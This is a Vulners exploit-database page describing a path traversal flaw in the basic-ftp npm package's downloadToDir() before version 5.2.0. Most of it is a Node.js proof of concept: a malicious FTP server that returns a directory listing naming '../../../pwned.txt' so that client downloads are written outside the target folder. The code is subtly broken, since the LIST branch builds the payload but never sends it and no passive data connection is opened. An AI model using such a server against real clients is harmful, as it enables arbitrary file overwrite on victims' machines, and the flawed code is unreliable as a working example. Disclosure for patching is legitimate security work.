Vulners
Lucene search
📄 basic-ftp downloadToDir() Path Traversal
=============================================================================================================================================
| # Title : basic-ftp prior to version 5.2.0 Path Traversal in downloadToDir() via Malicious FTP LIST Response |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/basic-ftp |
=============================================================================================================================================
[+] Summary : A path traversal vulnerability (CWE-22) exists in basic-ftp prior to version 5.2.0 within the downloadToDir() method.
The issue occurs when a malicious FTP server returns crafted directory listings containing traversal sequences such as ../. The vulnerable client fails to properly sanitize or validate the received filenames before writing them to disk.
As a result, files can be written outside the intended download directory, potentially leading to arbitrary file overwrite, application compromise, or further exploitation depending on execution context and privileges.
Version 5.2.0 resolves the issue by normalizing and validating resolved paths to ensure they remain within the designated download directory.
[+] POC :
// file: server.js
const net = require("net");
const PORT = 2121;
const TRAVERSAL_FILE = "../../../pwned.txt";
const server = net.createServer((socket) => {
console.log("Client connected");
socket.write("220 Welcome to Malicious FTP\r\n");
socket.on("data", (data) => {
const message = data.toString();
console.log("Received:", message.trim());
if (message.startsWith("USER")) socket.write("331 Password required\r\n");
else if (message.startsWith("PASS")) socket.write("230 User logged in\r\n");
else if (message.startsWith("SYST")) socket.write("215 UNIX Type: L8\r\n");
else if (message.startsWith("TYPE")) socket.write("200 Type set to I\r\n");
else if (message.startsWith("PASV")) {
socket.write("227 Entering Passive Mode (127,0,0,1,78,52)\r\n");
}
else if (message.startsWith("LIST")) {
socket.write("150 Opening ASCII mode data connection for file list\r\n");
const payload = `-rw-r--r-- 1 ftp ftp 1337 Jan 01 2026 ${TRAVERSAL_FILE}\r\n`;
socket.write("226 Transfer complete\r\n");
}
else {
socket.write("200 Command okay\r\n");
}
});
});
server.listen(PORT, () => {
console.log(`Malicious FTP Server running on port ${PORT}`);
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9